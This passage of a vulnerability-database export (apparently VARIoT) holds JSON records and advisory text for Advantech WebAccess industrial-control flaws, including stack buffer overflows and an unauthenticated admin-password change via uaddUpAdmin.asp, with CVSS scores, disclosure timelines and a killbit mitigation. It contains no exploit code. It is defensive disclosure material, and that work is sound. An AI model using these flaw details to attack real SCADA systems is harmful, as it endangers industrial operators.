"db": "IVD", "id": "7d7b572f-463f-11e9-9535-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2017-19444" } ], "trust": 1.41739574 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5" }, { "db": "IVD", "id": "7d7b572f-463f-11e9-9535-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2017-19444" } ] }, "last_update_date": "2022-05-17T01:43:11.243000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\73888E2B-FF04-416c-8847-984D7FC4507FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-558" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" }, { "trust": 0.6, "url": "http://www.zerodayinitiative.com/advisories/zdi-17-558/" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-558" }, { "db": "CNVD", "id": "CNVD-2017-19444" } ] }, "sources": { "_id": null, "data": [ { "db": "IVD", "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5", "ident": null }, { "db": "IVD", "id": "7d7b572f-463f-11e9-9535-000c29342cb1", "ident": null }, { "db": "ZDI", "id": "ZDI-17-558", "ident": null }, { "db": "CNVD", "id": "CNVD-2017-19444", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "IVD", "id": "7d7b572f-463f-11e9-9535-000c29342cb1", "ident": null }, { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-558", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19444", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-558", "ident": null }, { "date": "2017-08-08T00:00:00", "db": "CNVD", "id": "CNVD-2017-19444", "ident": null } ] }, "title": { "_id": null, "data": "Advantech WebAccess RtspVapgDecoderNew2 PMSettingData3D Width Stack Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "IVD", "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5" }, { "db": "IVD", "id": "7d7b572f-463f-11e9-9535-000c29342cb1" }, { "db": "CNVD", "id": "CNVD-2017-19444" } ], "trust": 1.0 }, "type": { "_id": null, "data": "Buffer overflow", "sources": [ { "db": "IVD", "id": "e018dbe7-3f33-48d3-9d02-da56931bf1f5" }, { "db": "IVD", "id": "7d7b572f-463f-11e9-9535-000c29342cb1" } ], "trust": 0.4 } }
var-201708-1701
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within VideoDAQ.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-540" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-540" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-540", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-540", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-540" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within VideoDAQ.dll. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-540" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4095", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-540", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-540" } ] }, "id": "VAR-201708-1701", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:45:11.793000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\C74A30E2-09B4-443B-B661-AD4F23781674If the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-540" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-540" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-540", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-540", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-540", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess VideoDAQ SDFileDownload Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-540" } ], "trust": 0.7 } }
var-201202-0219
Vulnerability from variot
uaddUpAdmin.asp in Advantech/BroadWin WebAccess before 7.0 does not properly perform authentication, which allows remote attackers to modify an administrative password via a password-change request. Advantech/BroadWin WebAccess of uaddUpAdmin.asp Contains a vulnerability where the administrator password can be changed due to improper authentication.A third party may change the administrator password via a password change request. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------
Ovum says ad hoc tools are out-dated. The best practice approach? Fast vulnerability intelligence, threat handling, and setup in one tool.
Read the new report on the Secunia VIM: http://secunia.com/products/corporate/vim/ovum_2011_request/
TITLE: Advantech OPC Server ADAM ActiveX Control Buffer Overflow Vulnerability
SECUNIA ADVISORY ID: SA46775
VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/46775/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
RELEASE DATE: 2011-11-07
DISCUSS ADVISORY: http://secunia.com/advisories/46775/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/46775/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=46775
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: A vulnerability has been reported in Advantech OPC Server, which can be exploited by malicious people to compromise a user's system.
The vulnerability is caused due to an error in the ADAM ActiveX control and can be exploited to cause a buffer overflow.
Successful exploitation may allow execution of arbitrary code.
The vulnerability is reported in the following components: * Advantech ADAM OPC Server versions prior to V3.01.012. * Advantech Modbus RTU OPC Server versions prior to V3.01.010. * Advantech Modbus TCP OPC Server versions prior to V3.01.010.
SOLUTION: Reportedly a patch has been released. Contact the vendor for further information.
PROVIDED AND/OR DISCOVERED BY: ICS-CERT credits Security Research and Service Institute Information and Communication Security Technology Center (ICST).
ORIGINAL ADVISORY: ICS-CERT: http://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
Show details on source website
{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201202-0219", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "6.0" }, { "model": "broadwin webaccess", "scope": "eq", "trust": 0.9, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "broadwin", "version": "7.0" }, { "model": "webaccess", "scope": "lt", "trust": 0.8, "vendor": "advantech", "version": "7.0" }, { "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "6.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "5.0" }, { "model": null, "scope": "eq", "trust": 0.2, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "19d2ce68-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0668" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001557" }, { "db": "CNNVD", "id": "CNNVD-201202-415" }, { "db": "NVD", "id": "CVE-2012-0239" } ] }, "configurations": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/configurations#", "children": { "@container": "@list" }, "cpe_match": { "@container": "@list" }, "data": { "@container": "@list" }, "nodes": { "@container": "@list" } }, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:broadwin:webaccess", "vulnerable": true }, { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2012-001557" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Sense Vulnerability Coordination Team, Greg MacManus of iSIGHT Partners, Kuang-Chun Hung of Security Research and Service Institute-Information and Communication Security Technology Center (ICST), Luigi Auriemma, and\nSnake (alias).", "sources": [ { "db": "BID", "id": "52051" } ], "trust": 0.3 }, "cve": "CVE-2012-0239", "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "nvd@nist.gov", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "CVE-2012-0239", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "IVD", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "19d2ce68-2354-11e6-abef-000c29c66e3d", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "VULHUB", "availabilityImpact": "NONE", "baseScore": 5.0, "confidentialityImpact": "NONE", "exploitabilityScore": 10.0, "id": "VHN-53520", "impactScore": 2.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:N/C:N/I:P/A:N", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2012-0239", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2012-0239", "trust": 0.8, "value": "Medium" }, { "author": "CNNVD", "id": "CNNVD-201202-415", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "19d2ce68-2354-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-53520", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "19d2ce68-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53520" }, { "db": "JVNDB", "id": "JVNDB-2012-001557" }, { "db": "CNNVD", "id": "CNNVD-201202-415" }, { "db": "NVD", "id": "CVE-2012-0239" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "uaddUpAdmin.asp in Advantech/BroadWin WebAccess before 7.0 does not properly perform authentication, which allows remote attackers to modify an administrative password via a password-change request. Advantech/BroadWin WebAccess of uaddUpAdmin.asp Contains a vulnerability where the administrator password can be changed due to improper authentication.A third party may change the administrator password via a password change request. Advantech Advantech specializes in network computer and network automation, providing more than 450 products including industrial data acquisition, automation software, computer platforms, Advantech industrial computers, computer motherboards and accessories. Advantech/BroadWin SCADA WebAccess is a fully browser-based Human Machine Interface (HMI) and Monitoring and Data Acquisition (SCADA) software. Advantech WebAccess is prone to multiple remote vulnerabilities. \nExploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database, execute arbitrary code gain access to sensitive information, cause a denial-of-service condition. Other attacks are possible. ----------------------------------------------------------------------\n\nOvum says ad hoc tools are out-dated. The best practice approach?\nFast vulnerability intelligence, threat handling, and setup in one tool. \n\nRead the new report on the Secunia VIM:\nhttp://secunia.com/products/corporate/vim/ovum_2011_request/ \n\n----------------------------------------------------------------------\n\nTITLE:\nAdvantech OPC Server ADAM ActiveX Control Buffer Overflow\nVulnerability\n\nSECUNIA ADVISORY ID:\nSA46775\n\nVERIFY ADVISORY:\nSecunia.com\nhttp://secunia.com/advisories/46775/\nCustomer Area (Credentials Required)\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nRELEASE DATE:\n2011-11-07\n\nDISCUSS ADVISORY:\nhttp://secunia.com/advisories/46775/#comments\n\nAVAILABLE ON SITE AND IN CUSTOMER AREA:\n * Last Update\n * Popularity\n * Comments\n * Criticality Level\n * Impact\n * Where\n * Solution Status\n * Operating System / Software\n * CVE Reference(s)\n\nhttp://secunia.com/advisories/46775/\n\nONLY AVAILABLE IN CUSTOMER AREA:\n * Authentication Level\n * Report Reliability\n * Secunia PoC\n * Secunia Analysis\n * Systems Affected\n * Approve Distribution\n * Remediation Status\n * Secunia CVSS Score\n * CVSS\n\nhttps://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775\n\nONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI:\n * AUTOMATED SCANNING\n\nhttp://secunia.com/vulnerability_scanning/personal/\nhttp://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/\n\nDESCRIPTION:\nA vulnerability has been reported in Advantech OPC Server, which can\nbe exploited by malicious people to compromise a user\u0027s system. \n\nThe vulnerability is caused due to an error in the ADAM ActiveX\ncontrol and can be exploited to cause a buffer overflow. \n\nSuccessful exploitation may allow execution of arbitrary code. \n\nThe vulnerability is reported in the following components:\n* Advantech ADAM OPC Server versions prior to V3.01.012. \n* Advantech Modbus RTU OPC Server versions prior to V3.01.010. \n* Advantech Modbus TCP OPC Server versions prior to V3.01.010. \n\nSOLUTION:\nReportedly a patch has been released. Contact the vendor for further\ninformation. \n\nPROVIDED AND/OR DISCOVERED BY:\nICS-CERT credits Security Research and Service Institute Information\nand Communication Security Technology Center (ICST). \n\nORIGINAL ADVISORY:\nICS-CERT:\nhttp://www.us-cert.gov/control_systems/pdf/ICSA-11-279-01.pdf\n\nOTHER REFERENCES:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nDEEP LINKS:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED DESCRIPTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXTENDED SOLUTION:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\nEXPLOIT:\nFurther details available in Customer Area:\nhttp://secunia.com/vulnerability_intelligence/\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\nprivate users keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/advisories/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/advisories/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n", "sources": [ { "db": "NVD", "id": "CVE-2012-0239" }, { "db": "JVNDB", "id": "JVNDB-2012-001557" }, { "db": "CNVD", "id": "CNVD-2012-0668" }, { "db": "BID", "id": "52051" }, { "db": "IVD", "id": "19d2ce68-2354-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-53520" }, { "db": "PACKETSTORM", "id": "106765" } ], "trust": 2.79 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "NVD", "id": "CVE-2012-0239", "trust": 3.6 }, { "db": "ICS CERT", "id": "ICSA-12-047-01", "trust": 2.3 }, { "db": "BID", "id": "52051", "trust": 1.4 }, { "db": "CNNVD", "id": "CNNVD-201202-415", "trust": 0.9 }, { "db": "CNVD", "id": "CNVD-2012-0668", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-12-047-01A", "trust": 0.8 }, { "db": "JVNDB", "id": "JVNDB-2012-001557", "trust": 0.8 }, { "db": "ICS CERT", "id": "ICSA-11-279-01", "trust": 0.4 }, { "db": "IVD", "id": "19D2CE68-2354-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "SECUNIA", "id": "46775", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-53520", "trust": 0.1 }, { "db": "PACKETSTORM", "id": "106765", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "19d2ce68-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0668" }, { "db": "VULHUB", "id": "VHN-53520" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001557" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-415" }, { "db": "NVD", "id": "CVE-2012-0239" } ] }, "id": "VAR-201202-0219", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "IVD", "id": "19d2ce68-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0668" }, { "db": "VULHUB", "id": "VHN-53520" } ], "trust": 1.551177005 }, "iot_taxonomy": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 0.8 } ], "sources": [ { "db": "IVD", "id": "19d2ce68-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0668" } ] }, "last_update_date": "2024-11-23T21:46:31.064000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "WebAccess", "trust": 0.8, "url": "http://www.advantech.co.jp/products/Webaccess-HMI-SCADA-Software/sub_GF-1M94V.aspx" }, { "title": "WebAccess", "trust": 0.8, "url": "http://www.broadwin.com/features.htm" }, { "title": "Offices Distributors", "trust": 0.8, "url": "http://www.broadwin.com/Offices.htm" }, { "title": "\u30d1\u30fc\u30c8\u30ca\u30fc\u60c5\u5831", "trust": 0.8, "url": "http://www.advantech.co.jp/support-AJP/distributors.asp" }, { "title": "Top Page", "trust": 0.8, "url": "http://www.advantech.co.jp/" }, { "title": "Patch for Advantech WebAccess Vulnerability (CNVD-2012-0668)", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/10252" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0668" }, { "db": "JVNDB", "id": "JVNDB-2012-001557" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-287", "trust": 1.9 } ], "sources": [ { "db": "VULHUB", "id": "VHN-53520" }, { "db": "JVNDB", "id": "JVNDB-2012-001557" }, { "db": "NVD", "id": "CVE-2012-0239" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01.pdf" }, { "trust": 1.1, "url": "http://www.securityfocus.com/bid/52051" }, { "trust": 0.8, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2012-0239" }, { "trust": 0.8, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-12-047-01a.pdf" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2012-0239" }, { "trust": 0.4, "url": "http://www.us-cert.gov/control_systems/pdf/icsa-11-279-01.pdf" }, { "trust": 0.3, "url": "http://webaccess.advantech.com/product.php" }, { "trust": 0.1, "url": "https://ca.secunia.com/?page=viewadvisory\u0026vuln_id=46775" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_intelligence/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/secunia_security_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/about_secunia_advisories/" }, { "trust": 0.1, "url": "http://secunia.com/vulnerability_scanning/personal/" }, { "trust": 0.1, "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org" }, { "trust": 0.1, "url": "http://secunia.com/products/corporate/vim/ovum_2011_request/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/" }, { "trust": 0.1, "url": "http://secunia.com/advisories/46775/#comments" } ], "sources": [ { "db": "CNVD", "id": "CNVD-2012-0668" }, { "db": "VULHUB", "id": "VHN-53520" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001557" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": "CNNVD", "id": "CNNVD-201202-415" }, { "db": "NVD", "id": "CVE-2012-0239" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "IVD", "id": "19d2ce68-2354-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2012-0668" }, { "db": "VULHUB", "id": "VHN-53520" }, { "db": "BID", "id": "52051" }, { "db": "JVNDB", "id": "JVNDB-2012-001557" }, { "db": "PACKETSTORM", "id": "106765" }, { "db": 